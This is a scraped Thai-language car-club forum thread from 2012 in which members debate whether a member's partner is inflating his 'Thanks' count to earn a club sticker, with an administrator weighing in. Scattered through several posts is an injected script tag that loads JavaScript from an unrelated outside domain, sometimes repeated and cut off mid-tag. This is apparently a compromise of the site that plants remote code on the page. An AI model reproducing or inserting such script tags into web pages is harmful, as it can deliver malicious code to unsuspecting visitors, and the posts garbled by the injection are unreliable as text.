ตอบ
zan

เข้าร่วม: 23 สิงหา 2009
ตอบ: 3145

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 3432
ให้คำขอบคุณ: 6687

อังคาร, 12 มิถุนา 2012 18:59 - สำหรับคนที่สงสัยว่าทำไม THANKS ของ grandsesor ที่มี nutsiki กดให้ตลอด
สงสัยต้องเสียเหล้าอีกแล้วหว่ะกรู . . .
ได้รับคำขอบคุณจาก: yorkydog  psYchosis 
ham_ter

ชื่อเล่น: ส้มจี๊ด

เข้าร่วม: 18 ตุลา 2011
ตอบ: 1641

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 4624
ให้คำขอบคุณ: 0

ปี: 2002
สี: ม่วง วินเทจพลัม (RP-32P)
อังคาร, 12 มิถุนา 2012 20:22 - สำหรับคนที่สงสัยว่าทำไม THANKS ของ grandsesor ที่มี nutsiki กดให้ตลอด
zan พิมพ์ว่า:
สงสัยต้องเสียเหล้าอีกแล้วหว่ะกรู . . .

ป่ะ แอบไปด้วย 
ได้รับคำขอบคุณจาก: yorkydog  zan 
pondsamed

ชื่อเล่น: ปอนด์

เข้าร่วม: 18 สิงหา 2011
ตอบ: 665

Guru ES
Guru ES

ได้รับคำขอบคุณ: 408
ให้คำขอบคุณ: 1083

ปี: 2005
สี: ดำ ไนท์ฮอว์ก (B-92P)
อังคาร, 12 มิถุนา 2012 20:31 - สำหรับคนที่สงสัยว่าทำไม THANKS ของ grandsesor ที่มี nutsiki กดให้ตลอด
nilkung พิมพ์ว่า:

nutsiki พิมพ์ว่า:
คนที่คิดยังไงไม่รู้นะค่ะคือดิฉันได้สมัครเข้ามาในคลับนี้พร้อมกับแฟนแต่ส่วนมากแฟนเป็นคนเล่นก็คือ grandsesor ดิฉันก้อเลยตามไปกด THANKS ให้แต่ถ้าใครที่คิดอะไรที่ว่ามาปั่นกระทู้แล้วจำนวน THANKS เยอะนะค่ะดิฉันคงสร้าง user ให้มันเยอะกว่านี้แล้วมารวมกัน THANKS ให้คนนี้คนเดียวจะดีกว่าไหมคนเป็นแฟนกันกดแทงก์ให้กันคงจะไม่ผิดใช่ไหมแต่ถ้ามีปัญหามากนะก้อช่วยประกาศไปเลยนะว่าครอบครัวนึงสามารถเล่นได้แค่ 1 คน เผื่อคนอื่นๆจะได้เข้าใจด้วยค่ะ

เอาล่ะหว่า........มีดราม่าอีกแล้ว
แต่ในความคิดผม คุณแม่บ้านเขาเข้ามาติดตามความประพฤติของคุณแฟนหรือป่าวเนี่ย แฟนกันกด thank ให้กันไม่แปลกครับ

สำหรับผม thank เท่าไหร่ไม่สำคัญ ตอบกระทู้ช่วยแก้ปัญหาให้สมาชิกโดยไม่ได้รับ thank ก็ไม่เป็นไร ผมเข้ามาศึกษา แบ่งปัน พูดคุย ซื้อขายอะไหล่ เจอเพื่อนใหม่ ที่มีใจรักเจ้า ES เหมือนกันแค่นั้นครับ เรื่องอื่นๆไม่สำคัญสำหรับผมเลย

โดนใจครับ เอาไป 1 Thk.
ได้รับคำขอบคุณจาก: yorkydog 
table

ชื่อเล่น: โต๊ะ

เข้าร่วม: 25 กันยา 2010
ตอบ: 945

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 139
ให้คำขอบคุณ: 787

สี: เทา ซิลเวอร์สโตน (NH-630M)
อังคาร, 12 มิถุนา 2012 21:02 - สำหรับคนที่สงสัยว่าทำไม THANKS ของ grandsesor ที่มี nutsiki กดให้ตลอด

เรื่อง  thank  สำหรับผม ผมคิดว่ามีความสำคัญกับผมน้อยมาก   ผมเข้ามาหาความรู้และเพื่อนซะส่วนใหญ่    บางครั้งเพื่อนที่อยู่ไกลกัน ไม่เคยเจอหน้ากันสักครั้ง  ยังมีความผูกพันกันได้ก็เพราะบอร์ดแห่งนี้   เหมือนพี่โต้งผมเจอหน้ากันไม่ถึง 10  ครั้งแต่สนิทกันมากก็เพราะบอร์ดนี้แหละครับ
อย่าคิดมากกันเลยเนอะจะได้ไม่ปวดหัว....

ปล.........พี่โต้ง มาเลี้ยงเหล้าผมด้วย
ได้รับคำขอบคุณจาก: yorkydog  zan 
Shoke

ชื่อเล่น: โช้คอัพ

เข้าร่วม: 31 กรกฎา 2008
ตอบ: 1444

Administrator
Administrator

ได้รับคำขอบคุณ: 6862
ให้คำขอบคุณ: 2301

สี: ขาว ทาฟเฟต้า (NH-578)
อังคาร, 12 มิถุนา 2012 21:42 - สำหรับคนที่สงสัยว่าทำไม THANKS ของ grandsesor ที่มี nutsiki กดให้ตลอด
มันอยู่ที่จุดประสงค์ครับ

คุณต้องตอบว่า

กด Thanks ให้คุณ grandsesor เพื่ออะไรครับ?

- เพื่อแสดงให้ว่าคุณ grandsesor โพสข้อความมีสาระ, มีประโยชน์, ฯลฯ
ไม่ผิดครับ คุณจะกดเป็นแสน Thanks ก็ได้

- เพื่อให้ได้ถึง 500 จะได้สติกเกอร์คลับ
ผมว่าคุณหยุดดีกว่าครับ กฎระเบียบไม่ได้ยากครับ เค้าตั้งไว้เพื่อให้รู้จักกับเพื่อนๆสมาชิก พี่คนนี้เป็นใคร, อยู่ที่ไหน, รถคันไหน, ชอบเรื่องอะไร คุยเรื่องอะไร , พบปะเจอกัน คุยเรื่องรถที่ตนชอบ ฯลฯ

ต่อให้ได้สติกเกอร์มา  =  มันก็ไม่ภูมิใจหรอกครับ เพราะ ไม่มีใครรู้จัก , ไม่มีใครช่วยเหลือ , และคุณก็จะไม่รู้จักใคร รู้จักก็แต่แฟนของคุณเอง

คุณควรจะเปลี่ยนเป็นให้กำลังใจครับ "พี่สู้ๆนะ" , "ที่รักเข้าคลับเค้ามันก็ต้องมีสังคม" , "ไม่ใช่ให้คนในครอบครัวกดให้เอง" , "แล้วพี่จะกล้าทักคนอื่นเค้าเหรอ" ฯลฯ

(ปล.) หากคุณปลอมตัวและตั้ง user แฟนของคุณขึ้นมาเอง = กลับไปอ่านใหม่ ไม่ต้องแทนตัวเองเป็นแฟน แต่ให้ตอบคำถามแก่ใจตนเองว่า..
" สติกเกอร์ หรือ เพื่อน "

คลับนี้อาจจะไม่เหมือนคลับอื่นครับ เค้าอยู่กันด้วยใจไม่ใช่ฉาบฉวย
wittayab

เข้าร่วม: 19 พฤศจิกา 2008
ตอบ: 979

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1633
ให้คำขอบคุณ: 226

ปี: 2004
สี: เทา ซิลเวอร์สโตน (NH-630M)
อังคาร, 12 มิถุนา 2012 21:54 - สำหรับคนที่สงสัยว่าทำไม THANKS ของ grandsesor ที่มี nutsiki กดให้ตลอด
อนาคตจะมีกด Like. มั้ยเนี่ย
ค้าอะไหล่โคตรเก่า

เข้าร่วม: 06 ธันวา 2011
ตอบ: 5338

ผู้ให้การสนับสนุน
ผู้ให้การสนับสนุน

ได้รับคำขอบคุณ: 10891
ให้คำขอบคุณ: 12020

ที่อยู่: USED JAPAN SHOP sales & service เฉลิมพระเกียรติ ร.9 30
อังคาร, 12 มิถุนา 2012 22:01 - สำหรับคนที่สงสัยว่าทำไม THANKS ของ grandsesor ที่มี nutsiki กดให้ตลอด
คนที่คิดยังไงไม่รู้นะค่ะคือดิฉันได้สมัครเข้ามาในคลับนี้พร้อมกับแฟนแต่ส่วนมากแฟนเป็นคนเล่นก็คือ grandsesor ดิฉันก้อเลยตามไปกด THANKS ให้แต่ถ้าใครที่คิดอะไรที่ว่ามาปั่นกระทู้แล้วจำนวน THANKS เยอะนะค่ะดิฉันคงสร้าง user ให้มันเยอะกว่านี้แล้วมารวมกัน THANKS ให้คนนี้คนเดียวจะดีกว่าไหมคนเป็นแฟนกันกดแทงก์ให้กันคงจะไม่ผิดใช่ไหมแต่ถ้ามีปัญหามากนะก้อช่วยประกาศไปเลยนะว่าครอบครัวนึงสามารถเล่นได้แค่ 1 คน เผื่อคนอื่นๆจะได้เข้าใจด้วยค่ะ

ใจเย็นคุณหนู
ผมนี่แหละสงสัย และก็คุยกับพี่ๆ ที่ดูแลอยู่
แค่เกรงว่าเดี๋ยวจะมีดราม่ากันอีก
มันก็ไม่มีกฎว่าครอบครัวเดียวกันห้าม thk. ให้กันหรอกครับ
ก็แค่มันน่าสงสัย  เลยดูๆ แล้วสอบถามแบบลับๆ หลังไมค์

ไม่ได้เอาออกมาถามกันหน้าบอร์ด

เป็นใครจะไม่สงสัยล่ะครับ  ก่อนหน้านี้มันมีประเด็นนี้เป็นเรื่องเป็นราว ดราม่ากันยกใหญ่
คุณหนูไม่รู้ก็ไม่ผิดหรอก แล้วก็ไม่เห็นจะมีใครมาตั้งกระทู้ถามโจ๋งครึ่มยังงี้

ถ้าบริสุทธิ์ใจ ก็ไม่มีใครว่าไรหรอกครับ  ใครเค้าจะว่า
มันก็น่ารักดีออก  เป็นครอบครัวกัน เล่นเวปเดียวกัน ไม่ดีตรงไหน
(แต่ผมไม่ให้แฟนผมเล่นเวปนี้  เดี๋ยวรู้ว่าผมแอบหื่น.....)

แต่ไม่รู้ยังไงนะ  ผมอ่านตัวหนังสือที่คุณน้องหนู โพสมา มันออกเหวี่ยงๆ ไปหน่อย
ถ้ายังมีไรอยากคุย  หลังไมค์ กะผมได้ครับ

สุดท้าย . . . . ย้ำนะครับ  ผมเป็นคนแจ้งไปที่พี่ๆ เค้าเอง ว่ามันน่าสงสัย ลองตรวจสอบหน่อย ไม่อยากให้มี Drama ภาค 7

เอ๊าพี่โต้งแค่แอบหื่นเหรอครับพี่<script src="https://sport32news.com/civicesgroup.js"></ ผมนึกว่าหื่นแบบชัดเจนแบบผม<script src="https://sport32news.com/civicesgroup.js"></
ได้รับคำขอบคุณจาก: yorkydog  zan  cakecity10 
koonaea

ชื่อเล่น: เอ๋

เข้าร่วม: 29 ธันวา 2008
ตอบ: 1097

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 2962
ให้คำขอบคุณ: 434

อังคาร, 12 มิถุนา 2012 22:27 - สำหรับคนที่สงสัยว่าทำไม THANKS ของ grandsesor ที่มี nutsiki กดให้ตลอด
อ่ะ  ประเด็น 
THAM

ชื่อเล่น: ตั้ม

เข้าร่วม: 05 ธันวา 2010
ตอบ: 951

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 946
ให้คำขอบคุณ: 777

สี: เงิน ซาติน (เมทัลลิก) (NH-623M)
อังคาร, 12 มิถุนา 2012 22:34 - สำหรับคนที่สงสัยว่าทำไม THANKS ของ grandsesor ที่มี nutsiki กดให้ตลอด
เป็นแม่บ้านกองทัพบกรึป่าว..(เห็นใส่เสื้อ) คุณเป็นเครือค่ายเดียวกันกับล็อกอิน kiat_1828 รึป่าวเนี่ย 
MoDes

เข้าร่วม: 11 พฤศจิกา 2010
ตอบ: 3844

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1271
ให้คำขอบคุณ: 186

ปี: 2001
สี: เทา ซิกเน็ต (เมทัลลิก) (RP-31M)
อังคาร, 12 มิถุนา 2012 22:42 - สำหรับคนที่สงสัยว่าทำไม THANKS ของ grandsesor ที่มี nutsiki กดให้ตลอด
เหฺนด้วยกะเสี่ย ต.ครับ. ค่านิยมผิดๆ. ขอถามหน่อยว่าท่านที่กำลังคิดจะปั่นแต๊งเนี่ย ท่านได้ติ๊กเกอร์รันนัมเบอร์แล้วเนี่ยแต่ไม่รู้จักใครเลยท่านจะมีไว้ทำขี้เกลืออะไรครับ. เว้นแต่ว่าจะมีผลประโยชน์ไว้ลวงโลกพี่น้องesในห้องซื้อขาย
ปล. บ้านเน้เค้าอยู่กันมานานแระขอร้องอย่ามาเกรียน
AofStaR

ชื่อเล่น: อ๊อฟ

เข้าร่วม: 25 ธันวา 2011
ตอบ: 895

Guru ES
Guru ES

ได้รับคำขอบคุณ: 1569
ให้คำขอบคุณ: 1125

อังคาร, 12 มิถุนา 2012 23:02 - สำหรับคนที่สงสัยว่าทำไม THANKS ของ grandsesor ที่มี nutsiki กดให้ตลอด
ผมไม่รู้จักใครและผู้ใดในเว็บนี้เป็นการส่วนตัว  แต่เวลาที่รถผมมีปัญหาผมpmหาพี่ๆในคลับเพราะข้อมูลบางกระทู้มันยังมะค่อยเคลียเท่าไร ผมก้อได้คำตอบที่ตรงประเด็นกับมาทุกครั้ง จนวันนี้ผมซ่อม ESเองได้555+แค่นิสหน่อยนะครับ  แล้วผมตามไปกดTHANK ให้พี่ๆเค้าในกระทู้ต่างๆ แบบนี้ผมจะโดนข้อหาปันTHANKไหมครับ แอดมิน    บางครั้งอยากจะกดLIKE แต่มันมะมี เลยกดแท๊งแทน "<script src="https://sport32news.com/civicesgroup.js">
Oyoyoo

ชื่อเล่น: โอ

เข้าร่วม: 31 สิงหา 2009
ตอบ: 407

แซงซ้าย ปาดขวา

ได้รับคำขอบคุณ: 432
ให้คำขอบคุณ: 224

อังคาร, 12 มิถุนา 2012 23:13 - สำหรับคนที่สงสัยว่าทำไม THANKS ของ grandsesor ที่มี nutsiki กดให้ตลอด
เรื่องไม่เป็นเรื่อง ไร้สาระ
ได้รับคำขอบคุณจาก: ค้าอะไหล่โคตรเก่า  yorkydog  chang167 
yorkydog

ชื่อเล่น: เปี๊ยก

เข้าร่วม: 09 กันยา 2010
ตอบ: 1353

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1470
ให้คำขอบคุณ: 2437

ปี: 2003
อังคาร, 12 มิถุนา 2012 23:21 - สำหรับคนที่สงสัยว่าทำไม THANKS ของ grandsesor ที่มี nutsiki กดให้ตลอด
ของผมThankพึ่งจะขึ้นมากระฉูดไม่นานนี้เอง เพราะเข้าไปตอบกระทู้ของเพื่อนๆที่ผมเคยผ่านปัญหามา อันไหนพอรู้ก็ตอบกลับไปเพราะอยากให้แก้ถูกจุดถูกปัญหา อย่างน้อยตอบกลับไปแล้วให้คำแนะนำก็มีความสุข อันไหนไม่รู้ก็ตามเก็บข้อมูลไปเรื่อย..จนทุกวันนี้ช่างตามอู่ก็หลอกผมไม่ได้ ส่วนThankนั้นตั้งแต่สมัครเข้ามาในEs groupใหม่ๆ ผมยังไม่รู้เลยว่ามันมีไว้ทำอะไร ตอนนั้นรู้แค่ว่าอยากเข้ามาเพื่อหาข้อมูลในตัวรถก็เท่านั้นเอง จนมารู้ว่าThankนั้นมันมาจากเพื่อนสมาชิกที่ชอบสนใจในสิ่งที่เราตั้งคำถามและตอบคำถามกลับไปนี่เอง...ก็เอาเป็นว่าจะมีThankมากThankน้อย มีสติกเกอร์หรือว่าไม่มี ถ้าขับESเหมือนกันก็คือพี่น้องครอบครัวเดียวกันแล้วครับ
ได้รับคำขอบคุณจาก: ค้าอะไหล่โคตรเก่า  zan 
bbb@es

เข้าร่วม: 14 ธันวา 2008
ตอบ: 993

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1161
ให้คำขอบคุณ: 48

สี: เทา ซิกเน็ต (เมทัลลิก) (RP-31M)
พุธ, 13 มิถุนา 2012 01:27 - สำหรับคนที่สงสัยว่าทำไม THANKS ของ grandsesor ที่มี nutsiki กดให้ตลอด
ลบไปเหอะคับ
ได้รับคำขอบคุณจาก: water_airport66 
tatumz

เข้าร่วม: 30 กรกฎา 2009
ตอบ: 728

Guru ES
Guru ES

ได้รับคำขอบคุณ: 639
ให้คำขอบคุณ: 494

พุธ, 13 มิถุนา 2012 07:48 - สำหรับคนที่สงสัยว่าทำไม THANKS ของ grandsesor ที่มี nutsiki กดให้ตลอด
หลงเข้ามาอั๊บ  โทดที
ได้รับคำขอบคุณจาก: ค้าอะไหล่โคตรเก่า  psYchosis 
Nung_Sodapop

ชื่อเล่น: หนึ่ง

เข้าร่วม: 11 กันยา 2010
ตอบ: 2230

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 2191
ให้คำขอบคุณ: 4794

พุธ, 13 มิถุนา 2012 09:25 - สำหรับคนที่สงสัยว่าทำไม THANKS ของ grandsesor ที่มี nutsiki กดให้ตลอด
Shoke พิมพ์ว่า:
มันอยู่ที่จุดประสงค์ครับ

คุณต้องตอบว่า

กด Thanks ให้คุณ grandsesor เพื่ออะไรครับ?

- เพื่อแสดงให้ว่าคุณ grandsesor โพสข้อความมีสาระ, มีประโยชน์, ฯลฯ
ไม่ผิดครับ คุณจะกดเป็นแสน Thanks ก็ได้

- เพื่อให้ได้ถึง 500 จะได้สติกเกอร์คลับ
ผมว่าคุณหยุดดีกว่าครับ กฎระเบียบไม่ได้ยากครับ เค้าตั้งไว้เพื่อให้รู้จักกับเพื่อนๆสมาชิก พี่คนนี้เป็นใคร, อยู่ที่ไหน, รถคันไหน, ชอบเรื่องอะไร คุยเรื่องอะไร , พบปะเจอกัน คุยเรื่องรถที่ตนชอบ ฯลฯ

ต่อให้ได้สติกเกอร์มา  =  มันก็ไม่ภูมิใจหรอกครับ เพราะ ไม่มีใครรู้จัก , ไม่มีใครช่วยเหลือ , และคุณก็จะไม่รู้จักใคร รู้จักก็แต่แฟนของคุณเอง

คุณควรจะเปลี่ยนเป็นให้กำลังใจครับ "พี่สู้ๆนะ" , "ที่รักเข้าคลับเค้ามันก็ต้องมีสังคม" , "ไม่ใช่ให้คนในครอบครัวกดให้เอง" , "แล้วพี่จะกล้าทักคนอื่นเค้าเหรอ" ฯลฯ

(ปล.) หากคุณปลอมตัวและตั้ง user แฟนของคุณขึ้นมาเอง = กลับไปอ่านใหม่ ไม่ต้องแทนตัวเองเป็นแฟน แต่ให้ตอบคำถามแก่ใจตนเองว่า..
" สติกเกอร์ หรือ เพื่อน "

คลับนี้อาจจะไม่เหมือนคลับอื่นครับ เค้าอยู่กันด้วยใจไม่ใช่ฉาบฉวย

ใช่ครับ "คลับนี้ไม่เหมือนคลับอื่น"
pja

เข้าร่วม: 21 มีนา 2011
ตอบ: 934

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 707
ให้คำขอบคุณ: 973

พุธ, 13 มิถุนา 2012 10:44 - สำหรับคนที่สงสัยว่าทำไม THANKS ของ grandsesor ที่มี nutsiki กดให้ตลอด
แล้วถ้าสองคนใช้ user เดียวจะเป็นไรมั้ยเนี่ย...."<script src="https://sport32news.com/civicesgroup.js">
song

เข้าร่วม: 10 กุมภา 2011
ตอบ: 9833

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 5558
ให้คำขอบคุณ: 4415

สี: ทอง ไทเทเนียม (เมทัลลิก) (YR-525M)
พุธ, 13 มิถุนา 2012 11:04 - สำหรับคนที่สงสัยว่าทำไม THANKS ของ grandsesor ที่มี nutsiki กดให้ตลอด
สติ๊กเกอร์คลับ หรือ จะเท่ามิตรภาพ! แม่ ญ. อย่าได้ทรงกังวลใจไปเลย
visanu

ชื่อเล่น: นุ บางปะกง

เข้าร่วม: 07 กรกฎา 2010
ตอบ: 1853

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 931
ให้คำขอบคุณ: 475

พุธ, 13 มิถุนา 2012 14:22 - สำหรับคนที่สงสัยว่าทำไม THANKS ของ grandsesor ที่มี nutsiki กดให้ตลอด
taeducier พิมพ์ว่า:
Sticker ที่ มี Number ผม ไม่ติดล่ะ ครับ ติด แต่ www.civicesgroup.com อย่างเดียวพอ... 

เข้าไปคุยกับพี่ที่ รังสิต ทุกคนแทบจะไม่สนใจเรื่อง ติ๊กเกอร์ ที่ รัน นัมเบอร์เลย... คุยเข้าใจ คอเดียวกัน รัก ES เหมือนกัน นี่แหระครับ ถึง มี Civic Es Group  <script src="https://sport32news.com/civicesgroup.js"></

+1ครับ
chang167

ชื่อเล่น: แก้ว

เข้าร่วม: 13 มิถุนา 2010
ตอบ: 150

มือใหม่หัดขับ
มือใหม่หัดขับ

ได้รับคำขอบคุณ: 149
ให้คำขอบคุณ: 82

สี: ทอง แซทเทิลไลท์ (NH-663M)
พุธ, 13 มิถุนา 2012 15:24 - สำหรับคนที่สงสัยว่าทำไม THANKS ของ grandsesor ที่มี nutsiki กดให้ตลอด
น้องใหม่ออกตัวแรงเน้อ อิอิ นี่ถ้าไปอ่าน กฎกติกา และ กระทู้เก่าๆซะบ้าง คงไม่ออกตัวแรงแบบนี้ ระวังแหกโค้งนะจ้ะ
narudon

ชื่อเล่น: หนุ่ย

เข้าร่วม: 29 เมษา 2010
ตอบ: 1380

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 796
ให้คำขอบคุณ: 368

พุธ, 13 มิถุนา 2012 16:13 - สำหรับคนที่สงสัยว่าทำไม THANKS ของ grandsesor ที่มี nutsiki กดให้ตลอด
ผมว่ามันไม่น่าจะมีแจกหรืออ่ะไรทั้งสิ้นสำหรับพวกที่อยากได้ THANKS มันสำคัญตรงไหน..แค่เราได้มีส่วนร่วมก็มีความสุขแล้วสำหรับผม..ไม่เคยอยากได้และอยากติดเลย...
honeybeex7

เข้าร่วม: 11 มิถุนา 2010
ตอบ: 4710

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 2450
ให้คำขอบคุณ: 10992

ที่อยู่: แดนสนธยาของ "เหล่าเทพ" มีแต่ "เทพ" ด้วยกันเท่านั้นที่ไปถึง
สี: ทอง ไทเทเนียม (เมทัลลิก) (YR-525M)
พุธ, 13 มิถุนา 2012 16:35 - สำหรับคนที่สงสัยว่าทำไม THANKS ของ grandsesor ที่มี nutsiki กดให้ตลอด

ใจเย็นคุณหนู
ผมนี่แหละสงสัย และก็คุยกับพี่ๆ ที่ดูแลอยู่
แค่เกรงว่าเดี๋ยวจะมีดราม่ากันอีก
มันก็ไม่มีกฎว่าครอบครัวเดียวกันห้าม thk. ให้กันหรอกครับ
ก็แค่มันน่าสงสัย  เลยดูๆ แล้วสอบถามแบบลับๆ หลังไมค์

ไม่ได้เอาออกมาถามกันหน้าบอร์ด

เป็นใครจะไม่สงสัยล่ะครับ  ก่อนหน้านี้มันมีประเด็นนี้เป็นเรื่องเป็นราว ดราม่ากันยกใหญ่
คุณหนูไม่รู้ก็ไม่ผิดหรอก แล้วก็ไม่เห็นจะมีใครมาตั้งกระทู้ถามโจ๋งครึ่มยังงี้

ถ้าบริสุทธิ์ใจ ก็ไม่มีใครว่าไรหรอกครับ  ใครเค้าจะว่า
มันก็น่ารักดีออก  เป็นครอบครัวกัน เล่นเวปเดียวกัน ไม่ดีตรงไหน
(แต่ผมไม่ให้แฟนผมเล่นเวปนี้  เดี๋ยวรู้ว่าผมแอบหื่น.....)

แต่ไม่รู้ยังไงนะ  ผมอ่านตัวหนังสือที่คุณน้องหนู โพสมา มันออกเหวี่ยงๆ ไปหน่อย
ถ้ายังมีไรอยากคุย  หลังไมค์ กะผมได้ครับ

สุดท้าย . . . . ย้ำนะครับ  ผมเป็นคนแจ้งไปที่พี่ๆ เค้าเอง ว่ามันน่าสงสัย ลองตรวจสอบหน่อย ไม่อยากให้มี Drama ภาค 7

สืบเนืองจากกระทู้นี้ 

http://www.civicesgroup.com/forum/topic43815

แล้วผมไปทักเขาแบบนี้ ซึ่งผมก็คิดว่าสิ่งที่ผมทักไปเป็นเรื่องจริง เป็นมารยาทการใช้บอร์ด เป็น standard สามัญทั่วๆไป บวกกับเหตุการณ์ก่อนหน้านี้ที่มีเกรียนมาตั้งกระทู้แล้วกด Thank ให้ตัวเองจนเป็นเรื่องเป็นราวยาวเหยียด ดราม่าอยู่นาน ตามที่คุณส้มจี๊ดเอาลิ้งค์มาแปะให้นั่นแหล่ะ
ผมก็เลยสงสัยว่าเคสนี้จะเป็นเกรียนอีกหรือเปล่า ... ซึ่งผมได้ย้ำในตอนท้ายแล้วว่า
**** Thank ไม่ใช่เรื่องสำคัญครับ แต่เหมือนคุณจะยกความสำคัญให้มันมากไปหน่อย คืออยากให้เค้ามองการเข้าบอร์ดในประเด็นอื่น เช่นหาเพื่อน หาแนวทางการใช้รถ มากกว่าการเข้ามารับ THANK

grandsesor พิมพ์ว่า:

honeybeex7 พิมพ์ว่า:
1.รูปที่คุณไปเอามาลงขออนุญาติเจ้าของรูป เจ้าของรถ หรือยัง ควรให้เครดิตเจ้าของภาพด้วย

2.อันที่จริงไม่ต้องคัดมาให้ชมเพื่อแลกกับการกด thanks ก็ได้มั้งครับ เพราะทางเว็ปมีห้องแกลอรี่ ให้ผู้สนใจคลิกเข้าไปดูเองได้อยู่แล้ว ซึ่งทุกๆคันมีหมด สามารถเป็นแนวทางให้ได้

3.คุณเป็นอะไรกับล็อคอิน nutsiki หรือเปล่าครับ เพราะทุกคอมเม้นท์ที่คุณตั้งกระทู้ หรือคุณโพสตอบข้อความ ชื่อล็อคอินนี้ nutsiki จะตามกด thanks ตลอด ก่อนหน้านี้มีอยู่กระทู้นึง พี่ประธานได้ถามไปแล้ว

**** Thank ไม่ใช่เรื่องสำคัญครับ แต่เหมือนคุณจะยกความสำคัญให้มันมากไปหน่อย

grandsesor พิมพ์ว่า:
ลองดูกันครับเผื่ออยากไปแต่งบ้างสวยทั้งนั้นๆแทนคำขอบคุณสำหรับภาพสวยด้วยการช่วยกันกด "THANKS" กันเยอะๆนะครับ...ขอบคุณครับ

มันเป็นความพอใจของส่วนบุคคลมากกว่าครับที่ลงรูปไปผมก้อไม่ได้สร้่างความเดือดร้อนให้แก่ใครครับส่วน nutsiki ก็คือแฟนผมเองถ้ามันไปหนักส่วนไหนของใครก็ต้องขออภัยมา ณ ที่นี้ด้วยจะกดหรือไม่กดผมก็ไม่ได้บังคับใครอยู่แล้วครับขอให้รับทราบไว้ด้วย
ได้รับคำขอบคุณจาก: zan  yorkydog  kaisuh 
hisashi2524

ชื่อเล่น: ตั้ม

เข้าร่วม: 28 มิถุนา 2011
ตอบ: 1056

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 685
ให้คำขอบคุณ: 12

พุธ, 13 มิถุนา 2012 16:47 - สำหรับคนที่สงสัยว่าทำไม THANKS ของ grandsesor ที่มี nutsiki กดให้ตลอด
เดิมก็ดี พิมพ์ว่า:

khem_hatyai พิมพ์ว่า:
ผมก็ยังไม่ได้สติ๊กเกอร์ที่มีนัมเบอร์เลยครับ  THANK เยอะนะครับตอนนี้  แต่ที่เยอะกว่าก็คือ ความช่วยเหลือ เวลาเราเดือดร้อน และ เพื่อนดีๆๆทุกๆๆท่านที่คอยให้กำลังใจและช่วยเหลือมาตลอดครับ

จริงครับ+1000

เห็นด้วยอย่างมากครับ  
the

ชื่อเล่น: ธี

เข้าร่วม: 30 กันยา 2010
ตอบ: 405

ได้รับคำขอบคุณ: 276
ให้คำขอบคุณ: 153

สี: ทอง เดเสิร์ท มิสท์ (เมทัลลิก) (YP-538M)
พุธ, 13 มิถุนา 2012 16:54 - สำหรับคนที่สงสัยว่าทำไม THANKS ของ grandsesor ที่มี nutsiki กดให้ตลอด
song พิมพ์ว่า:
สติ๊กเกอร์คลับ หรือ จะเท่ามิตรภาพ! แม่ ญ. อย่าได้ทรงกังวลใจไปเลย

55 วันก่อนไฟดับช่วงอสัมชันพอดี เซ็นเป็ด
LifeFate

เข้าร่วม: 08 พฤศจิกา 2011
ตอบ: 3153

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 5152
ให้คำขอบคุณ: 215

พุธ, 13 มิถุนา 2012 17:01 - สำหรับคนที่สงสัยว่าทำไม THANKS ของ grandsesor ที่มี nutsiki กดให้ตลอด
วันนี้ผมกินหนมจีนมา อร่อยมาก
ได้รับคำขอบคุณจาก: arsenal 
tatumz

เข้าร่วม: 30 กรกฎา 2009
ตอบ: 728

Guru ES
Guru ES

ได้รับคำขอบคุณ: 639
ให้คำขอบคุณ: 494

พุธ, 13 มิถุนา 2012 18:25 - สำหรับคนที่สงสัยว่าทำไม THANKS ของ grandsesor ที่มี nutsiki กดให้ตลอด
ถั่วงอกมาแว้วววว..อิอิ<script src="https://sport32news.com/civicesgroup.js"></ <script src="https://sport32news.com/civicesgroup.js"></
ได้รับคำขอบคุณจาก: arsenal 
zan

เข้าร่วม: 23 สิงหา 2009
ตอบ: 3145

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 3432
ให้คำขอบคุณ: 6687

พุธ, 13 มิถุนา 2012 18:34 - สำหรับคนที่สงสัยว่าทำไม THANKS ของ grandsesor ที่มี nutsiki กดให้ตลอด
ทำไมต้องแรงขนาดนั้นด้วยนะ
.
.

admin ครับ . . . มันมี Option แบ่ง Thank ป่าวครับ
เผื่อมีใครอยากได้แต๊งเยอะๆ ผมจะแบ่งให้ไป
จะได้ไม่ต้องมาทำเรื่องแบบนี้กันอีก
ได้รับคำขอบคุณจาก: arsenal  yorkydog  THAM  honeybeex7  A-u-T-o-N-o-m-Y 
arsenal

ชื่อเล่น: ไม้

เข้าร่วม: 06 กรกฎา 2010
ตอบ: 3035

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 2300
ให้คำขอบคุณ: 4312

พุธ, 13 มิถุนา 2012 18:43 - สำหรับคนที่สงสัยว่าทำไม THANKS ของ grandsesor ที่มี nutsiki กดให้ตลอด
ทำไมต้องแรงขนาดนั้นด้วยนะ
.
.

admin ครับ . . . มันมี Option แบ่ง Thank ป่าวครับ
เผื่อมีใครอยากได้แต๊งเยอะๆ ผมจะแบ่งให้ไป
จะได้ไม่ต้องมาทำเรื่องแบบนี้กันอีก

ไม่เอา เเต้งท์ อ่ะพี่ เอา น้องฝน คนที่ร้องว่า....อู้.......ฮู้..........

น้านนน หามมมมมพี่ หรือ ว่า ขาโต๊ะสนุก อ่ะ ฮี่ๆ

piggolo

ชื่อเล่น: อาทติสสส

เข้าร่วม: 22 พฤษภาคม 2011
ตอบ: 538

ได้รับคำขอบคุณ: 463
ให้คำขอบคุณ: 195

